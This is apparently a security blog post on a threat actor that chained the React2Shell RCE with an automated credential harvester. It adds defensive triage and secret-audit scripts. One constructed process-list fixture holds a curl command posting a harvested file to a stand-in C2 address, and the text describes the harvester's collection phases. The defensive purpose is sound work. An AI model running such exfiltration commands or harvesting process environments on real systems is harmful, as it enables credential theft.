A critical flaw in React Server Components is powering one of the fastest credential-harvesting operations in recent memory. Cisco Talos is tracking UAT-10608, a threat actor that compromised 766 hosts in a single day by chaining CVE-2025-55182 (React2Shell) with an automated secret-extraction framework called NEXUS Listener.
The Vulnerability: React2Shell
CVE-2025-55182 is a pre-authentication remote code execution vulnerability in React Server Components (RSC). The affected code deserializes the payload of inbound Server Function requests without adequately validating it. An attacker crafts a malicious serialized payload, sends it to a Server Function endpoint with no authentication, and gains arbitrary code execution in the server-side Node.js process.
CVSS score: 10.0. Pre-auth, no user interaction required.
The Harvest: What They Stole
Once inside, the attacker drops a multi-phase harvesting script into /tmp that systematically extracts everything of value. The numbers from the NEXUS Listener dashboard, out of 766 compromised hosts, speak for themselves:
- 701 hosts (91.5%) with database credentials
- 599 hosts (78.2%) with SSH private keys
- 196 hosts (25.6%) with AWS credentials
- 87 hosts (11.4%) with live Stripe API keys
- 66 hosts (8.6%) with GitHub tokens
The script runs through ten collection phases: environment variables, JS runtime secrets, SSH keys, pattern-matched tokens, shell history, cloud metadata, Kubernetes tokens, Docker configs, process command lines, and full process environments. Each phase sends data back to the C2 in chunks over port 8080.
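What a responder can do with the two hard indicators in that description (a script executed out of /tmp, and chunked exfiltration to the C2 on port 8080) is shown by the following added example. It is not Cisco Talos tooling and not code from the report: it parses the text of `ss -tnp` and `ps -eo pid,ppid,user,args` captured from a suspect host, flags established connections to a non-internal peer on port 8080 and interpreter processes running a script under /tmp, and links the two through the process tree. The two snapshots, the pids and the 203.0.113.45 address are constructed for the example; the rule that peers on RFC 1918, loopback and link-local ranges are benign is the example's own assumption.

```python
"""Host triage for the UAT-10608 post-exploitation chain: a harvesting script
dropped in /tmp whose output goes to the C2 over port 8080.

Added example, not Cisco Talos tooling. Inputs are the text of `ss -tnp` and
`ps -eo pid,ppid,user,args` from a suspect host. The snapshots at the bottom are
constructed; 203.0.113.45 is a documentation address standing in for the C2.
"""
import ipaddress
import re
from dataclasses import dataclass

C2_PORT = 8080  # exfiltration port reported by Talos; adjust if the actor moves

# Assumption of this example: peers in these ranges are legitimate internal
# services (plenty of apps talk to an internal 8080); only routable peers are flagged.
INTERNAL_NETS = [ipaddress.ip_network(n) for n in (
    "10.0.0.0/8", "172.16.0.0/12", "192.168.0.0/16", "127.0.0.0/8",
    "169.254.0.0/16", "::1/128", "fc00::/7", "fe80::/10")]

SS_LINE = re.compile(
    r"^(?P<state>\S+)\s+\d+\s+\d+\s+(?P<local>\S+)\s+(?P<peer>\S+)"
    r"(?:\s+(?P<users>users:\(.*\)))?")
SS_PROC = re.compile(r'\("(?P<name>[^"]+)",pid=(?P<pid>\d+),fd=\d+\)')
PS_LINE = re.compile(r"^\s*(?P<pid>\d+)\s+(?P<ppid>\d+)\s+(?P<user>\S+)\s+(?P<args>.*)$")
# an interpreter invoked on a script path under /tmp; interpreter flags allowed
TMP_SCRIPT = re.compile(r"^(?:\S*/)?(?:sh|bash|dash|node|python\d*)\s+(?:-\S+\s+)*/tmp/\S+")


@dataclass
class Finding:
    pid: int
    reason: str
    detail: str


def is_internal(host):
    try:
        ip = ipaddress.ip_address(host.strip("[]"))
    except ValueError:  # '*' or a hostname: cannot classify, so do not flag
        return True
    return any(ip in net for net in INTERNAL_NETS)


def suspicious_connections(ss_text):
    """Established sockets to a routable peer on C2_PORT, with the owning process."""
    findings = []
    for line in ss_text.splitlines():
        m = SS_LINE.match(line)
        if not m or m["state"] != "ESTAB":
            continue  # header line or non-established socket
        host, _, port = m["peer"].rpartition(":")
        if not port.isdigit() or int(port) != C2_PORT or is_internal(host):
            continue
        for p in SS_PROC.finditer(m["users"] or ""):
            findings.append(Finding(int(p["pid"]), "c2-egress", f'{p["name"]} -> {host}:{port}'))
    return findings


def parse_ps(ps_text):
    """pid -> (ppid, args); the header and malformed lines are skipped."""
    procs = {}
    for line in ps_text.splitlines():
        m = PS_LINE.match(line)
        if m:
            procs[int(m["pid"])] = (int(m["ppid"]), m["args"])
    return procs


def lineage(pid, procs):
    """pid, parent, grandparent, ... as far as the snapshot allows."""
    chain, seen = [], set()
    while pid in procs and pid not in seen:
        seen.add(pid)
        chain.append(pid)
        pid = procs[pid][0]
    return chain


def triage(ss_text, ps_text):
    procs = parse_ps(ps_text)
    scripts = [Finding(pid, "tmp-script", args)
               for pid, (_, args) in procs.items() if TMP_SCRIPT.match(args)]
    script_pids = {f.pid for f in scripts}
    conns = suspicious_connections(ss_text)
    for f in conns:
        chain = lineage(f.pid, procs)
        # egress from a descendant of a /tmp script is exactly the chain Talos describes
        if any(p in script_pids for p in chain[1:]):
            f.reason = "c2-egress-from-tmp-script"
            f.detail += " (tree: " + " <- ".join(map(str, chain)) + ")"
    return sorted(conns + scripts, key=lambda f: f.pid)


# Constructed snapshots: a Next.js server (pid 1187) legitimately talking to an
# internal 8080 service, and a child shell running /tmp/.h.sh whose curl posts
# a chunk to the C2.
SS_SAMPLE = """\
State Recv-Q Send-Q Local Address:Port  Peer Address:Port  Process
ESTAB 0      0      10.0.3.17:3000      10.0.3.2:51422     users:(("node",pid=1187,fd=22))
ESTAB 0      0      10.0.3.17:52010     10.0.9.40:8080     users:(("node",pid=1187,fd=31))
ESTAB 0      0      10.0.3.17:52344     203.0.113.45:8080  users:(("curl",pid=4412,fd=3))
"""
PS_SAMPLE = """\
  PID  PPID USER     COMMAND
    1     0 root     /sbin/init
 1187     1 app      node server.js
 4407  1187 app      /bin/sh /tmp/.h.sh
 4412  4407 app      curl -s -X POST http://203.0.113.45:8080/c -d @/tmp/.out.7
 4500     1 app      /bin/sh /usr/local/bin/healthcheck.sh
"""

if __name__ == "__main__":
    for f in triage(SS_SAMPLE, PS_SAMPLE):
        print(f"pid {f.pid:<6} {f.reason:<28} {f.detail}")
```

On a live host, feed `triage()` the captured output of the two commands instead of the samples. The node process's own connection to 10.0.9.40:8080 is deliberately not reported, so a C2 reachable only through an internal proxy would need INTERNAL_NETS narrowed; the script is a triage aid for the pattern in the report, not a general detector.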
The NEXUS Listener Framework
This isn't a one-off script. UAT-10608 operates a fully featured web-based C2 called NEXUS Listener that provides:
- Real-time statistics on compromised hosts and credential counts
- Search and filtering across all exfiltrated data
- Uptime tracking for the operation itself
Cisco Talos gained access to an exposed NEXUS Listener instance, which is how the full scope of the operation is known.
Why This Matters
The stolen secrets aren't just passwords. They're infrastructure takeover kits. AWS credentials lead to cloud account compromise. SSH keys enable lateral movement across networks. Stripe keys mean direct access to payment flows. GitHub tokens open the door to supply chain attacks.
And the targeting is indiscriminate — automated scanning of public-facing Next.js apps, likely via Shodan or Censys, followed by exploitation at scale.
What You Should Do Right Now
- Patch React/Next.js immediately — Update React and Next.js to versions that fix CVE-2025-55182
- Audit environment variable exposure — Inventory which secrets your Node.js processes carry in their environment and runtime; anything there is readable by code running in that process
- Rotate all credentials — If you even think you might be affected, rotate everything
- Require AWS IMDSv2 — Set instance metadata options to require session tokens, so a compromised process can't fetch the instance role's credentials with a single GET request
- Replace reused SSH keys — Unique keys per host, always
- Deploy secret scanning — Catch exposed tokens in code and logs
- Use WAF/RASP protections — For Next.js apps in particular
- Enforce least-privilege — Across containers, cloud roles, and runtime permissions
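As an added example for the "audit environment variable exposure" and "deploy secret scanning" items above, and for the collection phases listed earlier, here is a Python audit that is not from the Talos report. It reads the same source the harvester's "full process environments" phase reads, /proc/<pid>/environ, but for the defender: every hit is a secret a React2Shell-compromised process could already have handed over, and therefore a rotation candidate. The value patterns are the published token prefixes for AWS, Stripe and GitHub plus a generic credentialed database URI; the variable-name heuristic, the `audit_live_host` helper and the sample environment are constructed for this example.

```python
"""Environment-exposure audit for the credential classes in the Talos numbers:
database credentials, SSH private keys, AWS keys, Stripe keys, GitHub tokens.

Added example, not from the Talos report. Reads /proc/<pid>/environ like the
harvester does, but reports hits (redacted) for rotation. Run as root on a live
host; SAMPLE_ENV below is constructed so the logic runs offline.
"""
import os
import re

# Value shapes of the token classes in the statistics. AWS, Stripe and GitHub
# publish fixed prefixes; the database rule catches any URI embedding user:pass@.
VALUE_PATTERNS = {
    "aws_access_key": re.compile(r"\b(?:AKIA|ASIA)[0-9A-Z]{16}\b"),
    "stripe_live_key": re.compile(r"\b[sr]k_live_[0-9A-Za-z]{24,}\b"),
    "github_token": re.compile(
        r"\b(?:gh[pousr]_[A-Za-z0-9]{36,}|github_pat_[A-Za-z0-9_]{22,})\b"),
    "database_uri": re.compile(
        r"\b(?:postgres(?:ql)?|mysql|mongodb(?:\+srv)?|redis|mssql)://[^:/\s@]+:[^@\s]+@\S+",
        re.I),
    "ssh_private_key": re.compile(r"-----BEGIN (?:OPENSSH|RSA|EC|DSA) PRIVATE KEY-----"),
}
# Secrets without a fixed shape (an AWS secret access key, a plain password) can
# only be found by the variable's name. Heuristic chosen for this example.
SECRET_NAME = re.compile(r"SECRET|PASSW(?:OR)?D|TOKEN|PRIVATE_KEY|API_KEY|CREDENTIAL", re.I)


def redact(value):
    """Enough to recognise the credential in a report, never enough to use it."""
    return value[:4] + "..." + value[-2:] if len(value) > 12 else "***"


def classify_env(env):
    """env: {name: value}. Returns sorted (class, name, redacted_value) tuples."""
    hits = set()
    for name, value in env.items():
        for cls, rx in VALUE_PATTERNS.items():
            if rx.search(value):
                hits.add((cls, name, redact(value)))
        if value and SECRET_NAME.search(name):
            hits.add(("secret_by_name", name, redact(value)))
    return sorted(hits)


def parse_environ(blob):
    """Decode the NUL-separated contents of /proc/<pid>/environ into a dict."""
    env = {}
    for item in blob.split(b"\0"):
        if b"=" in item:
            k, _, v = item.partition(b"=")
            env[k.decode(errors="replace")] = v.decode(errors="replace")
    return env


def audit_live_host(proc="/proc"):
    """Yield (pid, comm, hits) for every readable process whose environment
    holds a secret. Other users' environ files are readable only by root."""
    for pid in sorted(p for p in os.listdir(proc) if p.isdigit()):
        try:
            with open(f"{proc}/{pid}/environ", "rb") as f:
                blob = f.read()
            with open(f"{proc}/{pid}/comm") as f:
                comm = f.read().strip()
        except OSError:  # process exited, or not ours and we are not root
            continue
        hits = classify_env(parse_environ(blob))
        if hits:
            yield int(pid), comm, hits


# Constructed environment of a Next.js process. The AWS pair is AWS's documented
# example pair; the other values are placeholders in the real token shapes.
SAMPLE_ENV = {
    "NODE_ENV": "production",
    "PORT": "3000",
    "PATH": "/usr/local/bin:/usr/bin",
    "DATABASE_URL": "postgresql://app:s3cretpass@db.internal:5432/app",
    "AWS_ACCESS_KEY_ID": "AKIAIOSFODNN7EXAMPLE",
    "AWS_SECRET_ACCESS_KEY": "wJalrXUtnFEMI/K7MDENG/bPxRfiCYEXAMPLEKEY",
    "STRIPE_SECRET_KEY": "sk_live_" + "0" * 16 + "EXAMPLE0",
    "GITHUB_TOKEN": "ghp_" + "A" * 36,
}
SAMPLE_ENVIRON = b"\0".join(f"{k}={v}".encode() for k, v in SAMPLE_ENV.items()) + b"\0"

if __name__ == "__main__":
    for cls, name, shown in classify_env(parse_environ(SAMPLE_ENVIRON)):
        print(f"{cls:<16} {name:<24} {shown}")
```

Note what the sample shows: AWS_SECRET_ACCESS_KEY is found only by its name, because the secret half of an AWS key pair has no fixed prefix, which is why a pattern-only scanner (and a pattern-only rotation plan) undercounts. On a live host, `sudo python3 audit.py` with a loop over `audit_live_host()` gives the per-process list; anything it prints on a host that was exposed to React2Shell goes on the rotation list regardless of whether exfiltration was confirmed.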
Source: Cisco Talos Intelligence Group. Full report: UAT-10608 Analysis